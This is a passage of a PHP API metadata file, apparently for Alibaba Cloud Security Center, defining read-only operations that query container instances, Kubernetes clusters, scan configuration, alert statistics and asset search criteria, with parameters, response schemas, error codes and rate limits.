'format' => 'int32', 'example' => '1', 'title' => ''], 'ExposedDetail' => ['description' => 'The exposure details in JSON format.', 'type' => 'string', 'example' => '[{\\"exposedName\\":\\"nginx-ingress-lb\\",\\"exposedType\\":\\"LoadBalancer\\",\\"portDOList\\":[{\\"name\\":\\"http\\",\\"nodePort\\":32268,\\"port\\":80,\\"targetPort\\":80},{\\"name\\":\\"https\\",\\"nodePort\\":32376,\\"port\\":443,\\"targetPort\\":443}]}] ', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve container instance information list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerInstances'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeContainerInstances', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"79CFF74D-E967-5407-8A78-EE03B925FDAA\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 45,\\n \\"Count\\": 3\\n },\\n \\"ContainerInstanceList\\": [\\n {\\n \\"ImageRepoTag\\": \\"0.3.1.0-dfa2010-aliyun\\",\\n \\"AppName\\": \\"alibaba-log-controller\\",\\n \\"PodIp\\": \\"172.24.XX.XX\\",\\n \\"VulCount\\": 15,\\n \\"HcStatus\\": \\"YES\\",\\n \\"ImageId\\": \\"registry-vpc.cn-beijing.aliyuncs.com/acs/log-controller@sha256:5b046e2de8c490819125193ee2eb71a66f2cc16c032dcd8b69ead4be1024****\\",\\n \\"ClusterId\\": \\"cfb41a869c71e4678a97021582dd8a****\\",\\n \\"ImageRepoName\\": \\"log-controller\\",\\n \\"HostIp\\": \\"172.24.XX.XX\\",\\n \\"Pod\\": \\"alibaba-log-controller-6f847f8786-mk2mg\\",\\n \\"RiskStatus\\": \\"YES\\",\\n \\"VulStatus\\": \\"YES\\",\\n \\"AlarmStatus\\": \\"YES\\",\\n \\"Image\\": \\"docker.io/library/nginx:latest\\",\\n \\"ImageRepoNamespace\\": \\"acs\\",\\n \\"ImageDigest\\": \\"5b046e2de8c490819125193ee2eb71a66f2cc16c032dcd8b69ead4be1024****\\",\\n \\"Namespace\\": \\"kube-system\\",\\n \\"InstanceId\\": \\"i-2zegzjyotydfkz9****\\",\\n \\"NodeInfo\\": \\"test\\",\\n \\"ImageUuid\\": \\"5f23dfbceec289a49ac94e035e2****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"UpdateMark\\": \\"79cff74d-e967-5407-8a78-ee03b9****\\",\\n \\"ContainerId\\": \\"48a6d9a92435a13ad573372c3f3c63b7e04d106458141df9f92155709d****\\",\\n \\"NodeName\\": \\"test\\",\\n \\"HcCount\\": 1,\\n \\"ClusterName\\": \\"test\\",\\n \\"RiskCount\\": \\"1\\",\\n \\"AlarmCount\\": 1,\\n \\"CreateTimestamp\\": 1670368337000,\\n \\"Exposed\\": 1,\\n \\"ExposedDetail\\": \\"[{\\\\\\\\\\\\\\"exposedName\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"nginx-ingress-lb\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"exposedType\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"LoadBalancer\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"portDOList\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"http\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"nodePort\\\\\\\\\\\\\\":32268,\\\\\\\\\\\\\\"port\\\\\\\\\\\\\\":80,\\\\\\\\\\\\\\"targetPort\\\\\\\\\\\\\\":80},{\\\\\\\\\\\\\\"name\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"https\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"nodePort\\\\\\\\\\\\\\":32376,\\\\\\\\\\\\\\"port\\\\\\\\\\\\\\":443,\\\\\\\\\\\\\\"targetPort\\\\\\\\\\\\\\":443}]}] \\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeContainerScanConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c8ca91e0907d94efaba7fb0827eb9****', 'title' => ''], 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'hhht-cluster-02', 'title' => ''], 'ChooseCount' => ['description' => 'The number of selected applications.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'AllCount' => ['description' => 'The total number of applications in the cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'AppNames' => ['description' => 'The container application name.', 'type' => 'string', 'example' => '[\\"alicloud-monitor-controller\\"]', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '69BFFCDE-37D6-5A49-A8BC-BB03AC83****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query container runtime scan configuration', 'summary' => 'Queries the container runtime scan configuration.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerScanConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeContainerScanConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"ClusterId\\": \\"c8ca91e0907d94efaba7fb0827eb9****\\",\\n \\"ClusterName\\": \\"hhht-cluster-02\\",\\n \\"ChooseCount\\": 10,\\n \\"AllCount\\": 100,\\n \\"AppNames\\": \\"[\\\\\\\\\\\\\\"alicloud-monitor-controller\\\\\\\\\\\\\\"]\\"\\n },\\n \\"RequestId\\": \\"69BFFCDE-37D6-5A49-A8BC-BB03AC83****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'DescribeContainerServiceK8sClusterKritisStatus' => [ 'summary' => 'Queries the Kritis status of a Container Service for Kubernetes (ACK) cluster.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '119.145.XXX.XXX', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The cluster ID.', 'type' => 'string', 'required' => false, 'example' => 'c0e9efc6dea5f41db93b7e977123c****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578AB****', 'title' => ''], 'KritisStatus' => [ 'description' => 'The Kritis status information of the ACK cluster.', 'type' => 'object', 'properties' => [ 'Install' => ['description' => 'Indicates whether Kritis is installed. Valid values:'."\n" ."\n" .'- **true**: Installed.'."\n" .'- **false**: Not installed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the kritis status of an ACK cluster', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerServiceK8sClusterKritisStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeContainerServiceK8sClusterKritisStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578AB****\\",\\n \\"KritisStatus\\": {\\n \\"Install\\": true\\n }\\n}","type":"json"}]', ], 'DescribeContainerServiceK8sClusterNamespaces' => [ 'summary' => 'Queries the namespace of a Container Service for Kubernetes (ACK) cluster.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92040', 'abilityTreeNodes' => ['FEATUREsasJEFOWE'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '140.205.XXX.XXX', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The cluster ID.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cf4435fefd45d4b1b8643f3a0bea3****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '0C8487EF-50C2-54BB-8634-10F8C35D****', 'title' => ''], 'K8sClusterNamespaces' => [ 'description' => 'The namespaces.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Namespace' => ['description' => 'The namespace.'."\n", 'type' => 'string', 'example' => 'default', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AckFailure', 'errorMessage' => 'Failed to operate ack.', 'description' => 'Failed to operate ack.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'DescribeContainerServiceK8sClusterNamespaces', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerServiceK8sClusterNamespaces'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeContainerServiceK8sClusterNamespaces', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0C8487EF-50C2-54BB-8634-10F8C35D****\\",\\n \\"K8sClusterNamespaces\\": [\\n {\\n \\"Namespace\\": \\"default\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeContainerServiceK8sClusters' => [ 'summary' => 'Queries a list of Container Service for Kubernetes (ACK) clusters.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasA217JR'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '42.120.XXX.XXX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '20456DD5-5CBF-5015-9173-12CA4246B***', 'title' => ''], 'K8sClusters' => [ 'description' => 'The information about the clusters.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the cluster.'."\n", 'type' => 'string', 'example' => 'cluster-test', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the cluster.'."\n", 'type' => 'string', 'example' => 'cdbbe7aa56cbf4b8f830f83718d26****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AckFailure', 'errorMessage' => 'Failed to operate ack.', 'description' => 'Failed to operate ack.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeContainerServiceK8sClusters', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerServiceK8sClusters'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeContainerServiceK8sClusters', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"20456DD5-5CBF-5015-9173-12CA4246B***\\",\\n \\"K8sClusters\\": [\\n {\\n \\"Name\\": \\"cluster-test\\",\\n \\"ClusterId\\": \\"cdbbe7aa56cbf4b8f830f83718d26****\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeContainerStatistics' => [ 'summary' => 'Queries the alert statistics of container assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'Cccfd68c474454665ace07efce924****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request, which can be used for troubleshooting and diagnostics.', 'type' => 'string', 'example' => '21DA46CA-2DCE-4FF6-907D-D5DBBB7518C8', 'title' => ''], 'Data' => [ 'description' => 'The detailed alert statistics of container assets.', 'type' => 'object', 'properties' => [ 'TotalNode' => ['description' => 'The total number of nodes in the container cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'RemindAlarmCount' => ['description' => 'The number of alerts with the **Reminder** risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TotalAlarmCount' => ['description' => 'The total number of security alerts in the container cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '6', 'title' => ''], 'SuspiciousAlarmCount' => ['description' => 'The number of alerts with the **Suspicious** risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'SeriousAlarmCount' => ['description' => 'The number of alerts with the **Urgent** risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'hasRiskNode' => ['description' => 'The number of nodes that have alerts in the container cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query alert statistics of container assets', 'description' => 'Only users who have purchased Container Registry Enterprise instances can invoke this operation.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeContainerStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"21DA46CA-2DCE-4FF6-907D-D5DBBB7518C8\\",\\n \\"Data\\": {\\n \\"TotalNode\\": 12,\\n \\"RemindAlarmCount\\": 1,\\n \\"TotalAlarmCount\\": 6,\\n \\"SuspiciousAlarmCount\\": 3,\\n \\"SeriousAlarmCount\\": 2,\\n \\"hasRiskNode\\": 4\\n }\\n}","type":"json"}]', ], 'DescribeContainerTags' => [ 'summary' => 'Retrieves the details of container assets by using an attribute.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'FieldName', 'in' => 'query', 'schema' => ['description' => 'The name of the attribute that is used for the query. Valid values:'."\n" ."\n" .'- **namespace**: the namespace'."\n" ."\n" .'- **appName**: the application name'."\n" ."\n" .'- **image**: the image'."\n" ."\n" .'- **tag**: the tag', 'type' => 'string', 'required' => true, 'example' => 'namespace', 'title' => ''], ], [ 'name' => 'FieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the attribute that is used for the query.', 'type' => 'string', 'required' => false, 'example' => 'demo4', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 200.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '200', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster to which the container belongs.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of clusters.', 'type' => 'string', 'required' => false, 'example' => 'c22143730ab6e40b09ec7c1c51d4d****', 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The namespace.', 'type' => 'string', 'required' => false, 'example' => 'test-name-01', 'title' => ''], ], [ 'name' => 'AppName', 'in' => 'query', 'schema' => ['description' => 'The name of the application.', 'type' => 'string', 'required' => false, 'example' => 'node-exporter', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '028CF634-5268-5660-9575-48C9ED6BF880', 'title' => ''], 'TagValues' => [ 'description' => 'An array that consists of the attributes of container assets.', 'type' => 'array', 'items' => ['description' => 'The value of the attribute.'."\n" ."\n" .'- If **FieldName** is set to **namespace**, the value of this parameter is the namespace.'."\n" ."\n" .'- If **FieldName** is set to **appName**, the value of this parameter is the application name.'."\n" ."\n" .'- If **FieldName** is set to **image**, the value of this parameter is the image.'."\n" ."\n" .'- If **FieldName** is set to **tag**, the value of this parameter is the tag.', 'type' => 'string', 'example' => 'node-exporter'."\n", 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"028CF634-5268-5660-9575-48C9ED6BF880\\",\\n \\"TagValues\\": [\\n \\"node-exporter\\\\n\\"\\n ]\\n}","type":"json"}]', 'title' => 'DescribeContainerTags', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerTags'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeContainerTags', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeCountNotScannedImage' => [ 'summary' => 'Queries the number of images that are not scanned.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'NotScannedCnt' => ['description' => 'The number of images that are not scanned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '28', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeCountNotScannedImage', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCountNotScannedImage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCountNotScannedImage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"NotScannedCnt\\": 28,\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\"\\n}","type":"json"}]', ], 'DescribeCountScannedImage' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '3F4236AB-7070-538D-85EB-98EBFE6C****', 'title' => ''], 'ScannedCount' => ['description' => 'The number of scanned images.', 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query scanned image statistics', 'summary' => 'Queries statistics on scanned image data.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCountScannedImage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCountScannedImage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3F4236AB-7070-538D-85EB-98EBFE6C****\\",\\n \\"ScannedCount\\": 11\\n}","type":"json"}]', ], 'DescribeCriteria' => [ 'summary' => 'Queries the filter conditions that are used to search for assets in fuzzy match mode.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'MachineTypes', 'in' => 'query', 'schema' => ['description' => 'The type of the asset. Valid values:'."\n" ."\n" .'* Set the value to **ecs**, which specifies to query all Elastic Compute Service (ECS) instances.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ecs', 'title' => ''], ], [ 'name' => 'Value', 'in' => 'query', 'schema' => ['description' => 'The keyword that you specify for fuzzy search when you query the asset.'."\n", 'type' => 'string', 'required' => false, 'example' => '47.96', 'title' => ''], ], [ 'name' => 'SupportAutoTag', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the keyword that you specify for fuzzy search can be automatically matched. Default value: **false**. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '8E6DDACF-99AF-5939-AFFD-FCCD3B01E724', 'title' => ''], 'CriteriaList' => [ 'description' => 'List of asset query condition information.', 'type' => 'array', 'items' => [ 'description' => 'Information on asset query conditions.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the search condition. Valid values:'."\n" ."\n" .'* **input**: The search condition needs to be specified.'."\n" .'* **select**: The search condition is an option that can be selected from the drop-down list.'."\n", 'type' => 'string', 'example' => 'input', 'title' => ''], 'Name' => ['description' => 'The name of the search condition. Valid values:'."\n" .' - **internetIp**: Public IP Address. '."\n" .' - **intranetIp**: Private IP Address.'."\n" .' - **instanceName**: Instance Name.'."\n" .' - **instanceId**: Instance ID. '."\n" .' - **machineType**: Instance Type. '."\n" .' - **clusterIdList**: Cluster ID list. '."\n" .' - **vpcInstanceId**: VPC ID. '."\n" .' - **osName**: OS. '."\n" .' - **osType**: OS type. '."\n" .' - **hcStatus**: Whether Baseline Risk Exists. '."\n" .' - **vulStatus**: Whether Vulnerability Exists. '."\n" .' - **asapVulStatus**: Whether there is an urgent vulnerability. '."\n" .' - **alarmStatus**: Whether Alert Exists. '."\n" .' - **riskStatus**: Whether there is a risk. '."\n" .' - **clientStatus**: Whether it is online. '."\n" .' - **clientSubStatus**: Client sub-status. '."\n" .' - **runningStatus**: Power-on status. '."\n" .' - **tagName**: Tag name. '."\n" .' - **vendorAuthAlias**: Authorized account remarks. '."\n" .' - **vendorUid**: Authorized account ID. '."\n" .' - **vendorUserName**: Authorized account name. '."\n" .' - **namespace**: Namespace. '."\n" .' - **appName**: Application name. '."\n" .' - **groupName**: Group name. '."\n" .' - **regionId**: Region. '."\n" .' - **groupId**: Group ID. '."\n" .' - **newInstance**: Whether it is a new asset. '."\n" .' - **containerStatus**: Whether there is a container. 